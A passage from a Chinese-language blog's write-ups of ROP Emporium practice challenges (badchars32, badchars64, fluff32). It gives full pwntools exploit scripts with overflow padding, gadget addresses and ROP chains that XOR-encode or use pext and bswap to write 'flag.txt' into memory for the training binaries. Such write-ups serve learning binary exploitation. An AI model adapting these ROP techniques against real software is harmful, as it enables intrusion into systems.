class="hljs-string">&#x27;./badchars32&#x27;</span>)<br><br><span class="hljs-comment">#异或加密</span><br>badchars=[<span class="hljs-string">&#x27;g&#x27;</span>,<span class="hljs-string">&#x27;a&#x27;</span>,<span class="hljs-string">&#x27;x&#x27;</span>,<span class="hljs-string">&#x27;.&#x27;</span>]<br>xor_byte=<span class="hljs-number">0x1</span><br>target_string=<span class="hljs-string">&quot;&quot;</span><br><span class="hljs-keyword">while</span>(<span class="hljs-number">1</span>):<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-string">&quot;flag.txt&quot;</span>:<br>        c=<span class="hljs-built_in">ord</span>(i)^xor_byte<br>        <span class="hljs-keyword">if</span> <span class="hljs-built_in">chr</span>(c) <span class="hljs-keyword">in</span> badchars:<br>            xor_byte+=<span class="hljs-number">1</span><br>            <span class="hljs-keyword">break</span><br>        <span class="hljs-keyword">else</span>:<br>            target_string+=<span class="hljs-built_in">chr</span>(c)<br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(target_string)==<span class="hljs-number">8</span>:<br>        <span class="hljs-keyword">break</span><br>    <br><br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x28</span>+<span class="hljs-number">4</span>)<br>print_file=elf.plt.print_file<br><span class="hljs-comment">#写入内存需要的gadget</span><br>mov_edi_esi=<span class="hljs-number">0x804854f</span><br>pop_esi_edi_ebp=<span class="hljs-number">0x80485b9</span><br>data_addr=<span class="hljs-number">0x804a018</span><br><span class="hljs-comment">#对内存数据再进行一次异或需要的gadget</span><br>xor_ebp_bl=<span class="hljs-number">0x8048547</span><br>pop_ebx_esi_edi_ebp=<span class="hljs-number">0x80485b8</span><br><br>payload=junk<br>payload+=p32(pop_esi_edi_ebp)<br>payload+=target_string[:<span class="hljs-number">4</span>].encode()<br>payload+=p32(data_addr)<br>payload+=p32(<span class="hljs-number">0</span>)<br>payload+=p32(mov_edi_esi)<br><br>payload+=p32(pop_esi_edi_ebp)<br>payload+=target_string[<span class="hljs-number">4</span>:<span class="hljs-number">8</span>].encode()<br>payload+=p32(data_addr+<span class="hljs-number">4</span>)<br>payload+=p32(<span class="hljs-number">0</span>)<br>payload+=p32(mov_edi_esi)<br><br><br><span class="hljs-comment">#等数据写入内存后，再通过xor指令来解密，从而绕过badchar检查</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(target_string)):<br>    payload+=p32(pop_ebx_esi_edi_ebp)<br>    payload+=p32(xor_byte)<br>    payload+=p32(<span class="hljs-number">0</span>)<br>    payload+=p32(<span class="hljs-number">0</span>)<br>    payload+=p32(data_addr+i)<br>    payload+=p32(xor_ebp_bl)<br><br><br>payload+=p32(print_file)+p32(<span class="hljs-number">0</span>)+p32(data_addr)<br><br><br>io.send(payload)<br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<h2 id="badchars64"><a class="markdownIt-Anchor" href="#badchars64"></a> badchars64</h2>
<p>这题和32位基本上一样的套路，唯一需要注意的就是传参方式。</p>
<p>不过我在做这题的时候还是遇到了一个很恶心的错误，当我写完exp后，发现在对字符串解密时，字符串会被解密成“flag.tzt&quot;,这个z就是加密后的字母，这说明他并没有被解密，但是其他又很正常，说明代码应该没有问题才对。调试了半天发现每当要异或这个字母的时候，进入寄存器的根本不是这个字母的地址，而是另一个地址。</p>
<p>如图，可以看到，栈的分布没有问题，但是本该是0x60102e的地方变成了0x6010eb，导致这个地址的字母没有解密成功。</p>
<p><img src="/posts/716baf74/image-20221104132014356.png" srcset="/img/loading.gif" lazyload alt="image-20221104132014356"></p>
<p>在这个地方卡了很久，后来在我室友的帮助下，才恍然发现，0xeb正好是那个badchar检验后被赋的值，而0x2e正好是’.‘的ascii码，因为这些放在payload上的地址是会经过badchar检验的，所以当到这个地址的时候，就被判断为是’.'了，所以那个地址就被修改了！</p>
<p>导致这个原因就是我把存字符串的地址选为了data段起始，028往上随便一加就到了02e了。</p>
<p>把他改为bss段起始就可以了。</p>
<p>exp如下：</p>
<p><img src="/posts/716baf74/image-20221104133623046.png" srcset="/img/loading.gif" lazyload alt="image-20221104133623046"></p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># 221104</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>elf = ELF(<span class="hljs-string">&#x27;./badchars&#x27;</span>)<br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span class="hljs-string">&#x27;./badchars&#x27;</span>)<br>    <br><span class="hljs-comment">#异或加密</span><br>badchars=[<span class="hljs-string">&#x27;g&#x27;</span>,<span class="hljs-string">&#x27;a&#x27;</span>,<span class="hljs-string">&#x27;x&#x27;</span>,<span class="hljs-string">&#x27;.&#x27;</span>]<br>xor_byte=<span class="hljs-number">0x1</span><br>target_string=<span class="hljs-string">&quot;&quot;</span><br><span class="hljs-keyword">while</span>(<span class="hljs-number">1</span>):<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-string">&quot;flag.txt&quot;</span>:<br>        c=<span class="hljs-built_in">ord</span>(i)^xor_byte<br>        <span class="hljs-keyword">if</span> <span class="hljs-built_in">chr</span>(c) <span class="hljs-keyword">in</span> badchars:<br>            xor_byte+=<span class="hljs-number">1</span><br>            <span class="hljs-keyword">break</span><br>        <span class="hljs-keyword">else</span>:<br>            target_string+=<span class="hljs-built_in">chr</span>(c)<br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(target_string)==<span class="hljs-number">8</span>:<br>        <span class="hljs-keyword">break</span><br>    <br>    <br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span>+<span class="hljs-number">8</span>)<br>print_file=elf.plt.print_file<br><br>mov_r13_r12=<span class="hljs-number">0x400634</span><br>pop_r12_r13_r14_15=<span class="hljs-number">0x40069c</span><br>data_addr=<span class="hljs-number">0x601038</span><br><br><br>xor_r15_r14b=<span class="hljs-number">0x400628</span><br>pop_r14_r15=<span class="hljs-number">0x4006a0</span><br><br>payload=junk<br>payload+=p64(pop_r12_r13_r14_15)<br>payload+=target_string.encode()<br>payload+=p64(data_addr)<br>payload+=p64(<span class="hljs-number">0</span>)<br>payload+=p64(<span class="hljs-number">0</span>)<br>payload+=p64(mov_r13_r12)<br><br>pop_rdi=<span class="hljs-number">0x4006a3</span><br><br><span class="hljs-comment">#等数据写入内存后，再通过xor指令来解密，从而绕过badchar检查</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(target_string)):<br>    payload+=p64(pop_r14_r15)<br>    payload+=p64(xor_byte)<br>    payload+=p64(data_addr+i)<br>    payload+=p64(xor_r15_r14b)<br><br><br>payload+=p64(pop_rdi)+p64(data_addr)+p64(print_file) <br><br><span class="hljs-comment"># gdb.attach(io)</span><br><span class="hljs-comment"># sleep(4)</span><br>io.send(payload)<br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<h1 id="challenge-6"><a class="markdownIt-Anchor" href="#challenge-6"></a> Challenge 6</h1>
<h2 id="fluff32"><a class="markdownIt-Anchor" href="#fluff32"></a> fluff32</h2>
<p>这道题方法上和write基本上相同，但是不同之处是可用gadget的使用更加少了，用ROPgadget找了以后可以发现我们无法找到一个用mov来将数据写入内存的指令，这使得我们在write中用的ROP链无法构造。</p>
<p>所以要寻找新的方法。</p>
<p>但是其实作者在文件里给出了提示：</p>
<p>正是在usefulFunction函数的下面有一些questionableGadgets:</p>
<p><img src="/posts/716baf74/image-20221106151334860.png" srcset="/img/loading.gif" lazyload alt="image-20221106151334860"></p>
<h2 id="xchg指令"><a class="markdownIt-Anchor" href="#xchg指令"></a> xchg指令</h2>
<p>xchg dl [ecx]</p>
<p>首先我们来看这个指令，这个指令的意思是交换一个字节内存和寄存器的值，这就可以之前mov的功能了。</p>
<p>有了这条指令，那么接下来就需要有向edx和ecx写入值的指令了。</p>
<p>但是用ropgadget找了后发现，没有特别合适的指令。但是恰好作者提供的另外两条指令可以实现这个目的。</p>
<h3 id="bswap指令"><a class="markdownIt-Anchor" href="#bswap指令"></a> bswap指令</h3>
<p>这个指令的作用是更改字节序，将大端序的字节转化为小端，小端的转化为大端，举个例子就是，如果我们输入0x11223344,经过这个指令转化后就会变成0x44332211。</p>
<p><img src="/posts/716baf74/845133_EV6CNVNPDJDFJRJ.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>而从第一条指令可以看出，我们是将地址存入ecx中，将字符写入edx中，而我们要的字节序是小端（linux)</p>
<p>所以只需要在存入地址时以大端序存入即可。</p>
<h3 id="pext指令"><a class="markdownIt-Anchor" href="#pext指令"></a> pext指令</h3>
<p>PEXT （ Parallel Bits Extract）这条指令根据掩码（第二个源操作数），将源寄存器中对应的bit放到目标寄存器中的低位</p>
<p>具体如图所示：</p>
<p><img src="/posts/716baf74/845133_U88RSH7RG75F23K.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>而根据上面那条提供的包含pext的指令，我们可以发现，src1已经确定了，被存在eax中，是0xbab0baba，所以需要根据我们要的输出确定一下mask，并将其存在ebp中，这条指令会将其放入eax中。</p>
<p>可以通过下面的这个函数来求出mask的值</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_Mask</span>(<span class="hljs-params">src,output</span>):</span><br>    highBitInOutput=<span class="hljs-number">0</span><br>    hasUsedBitInSrc=<span class="hljs-number">0</span><br>    mask=<span class="hljs-number">0</span><br>    <span class="hljs-comment">#获取输出中的最高有效位</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>        <span class="hljs-keyword">if</span>(output&amp;(<span class="hljs-number">1</span>&lt;&lt;i))!=<span class="hljs-number">0</span>:<br>            highBitInOutput=i<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(highBitInOutput+<span class="hljs-number">1</span>):<br>        <span class="hljs-comment">#从末位开始找，直到找到和输出一样的位</span><br>        <span class="hljs-keyword">while</span> output&amp;<span class="hljs-number">1</span> !=src&amp;<span class="hljs-number">1</span>:<br>            src&gt;&gt;=<span class="hljs-number">1</span><br>            hasUsedBitInSrc+=<span class="hljs-number">1</span><br>            <span class="hljs-comment">#无法满足要求</span><br>            <span class="hljs-keyword">if</span> hasUsedBitInSrc==<span class="hljs-number">32</span>:<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br>            <br>        <span class="hljs-comment">#找到的话更新mask的值</span><br>        mask|=<span class="hljs-number">1</span>&lt;&lt;(hasUsedBitInSrc) <br>		<span class="hljs-comment">#右移更新末位</span><br>        output&gt;&gt;=<span class="hljs-number">1</span><br>        src&gt;&gt;=<span class="hljs-number">1</span><br>        hasUsedBitInSrc+=<span class="hljs-number">1</span><br>    <span class="hljs-keyword">return</span> mask<br><br><span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> <span class="hljs-string">&#x27;flag.txt&#x27;</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(get_Mask(<span class="hljs-number">0xbab0baba</span>,<span class="hljs-built_in">ord</span>(c))))<br></code></pre></div></td></tr></table></figure>
<p>完整的exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># 221106</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>elf = ELF(<span class="hljs-string">&#x27;./fluff32&#x27;</span>)<br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;i386&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span class="hljs-string">&#x27;./fluff32&#x27;</span>)<br><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">输入源寄存器和结果,输入mask的值</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_Mask</span>(<span class="hljs-params">src,output</span>):</span><br>    highBitInOutput=<span class="hljs-number">0</span><br>    hasUsedBitInSrc=<span class="hljs-number">0</span><br>    mask=<span class="hljs-number">0</span><br>    <span class="hljs-comment">#获取输出中的最高有效位</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>        <span class="hljs-keyword">if</span>(output&amp;(<span class="hljs-number">1</span>&lt;&lt;i))!=<span class="hljs-number">0</span>:<br>            highBitInOutput=i<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(highBitInOutput+<span class="hljs-number">1</span>):<br>        <span class="hljs-comment">#从末位开始找，直到找到和输出一样的位</span><br>        <span class="hljs-keyword">while</span> output&amp;<span class="hljs-number">1</span> !=src&amp;<span class="hljs-number">1</span>:<br>            src&gt;&gt;=<span class="hljs-number">1</span><br>            hasUsedBitInSrc+=<span class="hljs-number">1</span><br>            <span class="hljs-comment">#无法满足要求</span><br>            <span class="hljs-keyword">if</span> hasUsedBitInSrc==<span class="hljs-number">32</span>:<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br>            <br>        <span class="hljs-comment">#找到的话更新mask的值</span><br>        mask|=<span class="hljs-number">1</span>&lt;&lt;(hasUsedBitInSrc) <br>		<span class="hljs-comment">#右移更新末位</span><br>        output&gt;&gt;=<span class="hljs-number">1</span><br>        src&gt;&gt;=<span class="hljs-number">1</span><br>        hasUsedBitInSrc+=<span class="hljs-number">1</span><br>    <span class="hljs-keyword">return</span> mask<br>    <br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x28</span>+<span class="hljs-number">4</span>)<br>print_file=elf.plt.print_file<br><br>xchg_dl_ecx=<span class="hljs-number">0x8048555</span><br>pop_ecx_bswap_ecx=<span class="hljs-number">0x8048558</span><br>pext_edx_ebx_eax=<span class="hljs-number">0x8048543</span><br>pop_ebp=<span class="hljs-number">0x080485bb</span><br><br><br>data_addr=<span class="hljs-number">0x804a018</span><br><br>target_string=<span class="hljs-string">&#x27;flag.txt&#x27;</span><br><br>payload=junk<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(target_string)):<br>    mask=get_Mask(<span class="hljs-number">0xbab0baba</span>,<span class="hljs-built_in">ord</span>(target_string[i]))<br>    <span class="hljs-comment">#设置ebp的值</span><br>    payload+=p32(pop_ebp)<br>    payload+=p32(mask)<br>    <span class="hljs-comment"># mov eax, ebp；mov ebx, 0B0BABABAh；pext edx, ebx, eax；mov eax, 0DEADBEEFh；retn</span><br>    <span class="hljs-comment">#ebp的值存入eax,然后根据mask的值将edx设置为对应值</span><br>    payload+=p32(pext_edx_ebx_eax)  <br>    <span class="hljs-comment">#pop ecx; bswap dl,[ecx];retn</span><br>    <span class="hljs-comment">#变换ecx的字节序，所以以大端存入，使其变为小端</span><br>    payload+=p32(pop_ecx_bswap_ecx)<br>    payload+=p32(data_addr+i,endianness=<span class="hljs-string">&quot;big&quot;</span>)<br>    <span class="hljs-comment">#交换dl和ecx保存的内存中的值，即将edx中的值存入内存中</span><br>    payload+=p32(xchg_dl_ecx)<br><br><br>payload+=p32(print_file)+p32(<span class="hljs-number">0</span>)+p32(data_addr)<br><br><span class="hljs-comment"># gdb.attach(io)</span><br><span class="hljs-comment"># sleep(4)</span><br>io.send(payload)<br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<p>参考了这位佬的题解才做出来</p>
<p>参考链接：[<a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-272054.htm">原创]writeup-ROP Emporium fluff-二进制漏洞-看雪论坛-安全社区|安全招聘|bbs.pediy.com</a></p>
<h2 id="fluff64"><a class="markdownIt-Anchor" href="#fluff64"></a> fluff64</h2>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，著作权归作者所有，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    
      <script type="text/javascript">
        var disqus_config = function() {
          this.page.url = 'https://zino00.github.io/posts/716baf74/';
          this.page.identifier = '/posts/716baf74/';
        };
        Fluid.utils.loadComments('#disqus_thread', function() {
          var d = document, s = d.createElement('script');
          s.src = '//' + 'fluid' + '.disqus.com/embed.js';
          s.setAttribute('data-timestamp', new Date());
          (d.head || d.body).appendChild(s);
        });
      </script>
    
    <noscript>Please enable JavaScript to view the comments</noscript>
  </div>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a  rel="nofollow noopener"><span>Copyrights © 2021</span></a> <i class="iconfont icon-love"></i> <a  target="_blank" rel="nofollow noopener"><span>Zino</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?d1745c2e21adaa6ae90b93f4f4d22da9";
      var s = document.getElementsByTagName("script")[0]; 
      s.parentNode.insertBefore(hm, s);
    })();
    </script>
    
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>





  

  
    <!-- KaTeX -->
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.13.10/dist/katex.min.css" />
  








  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?f45dcd001d67e8f9d84f91248ea31abf";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
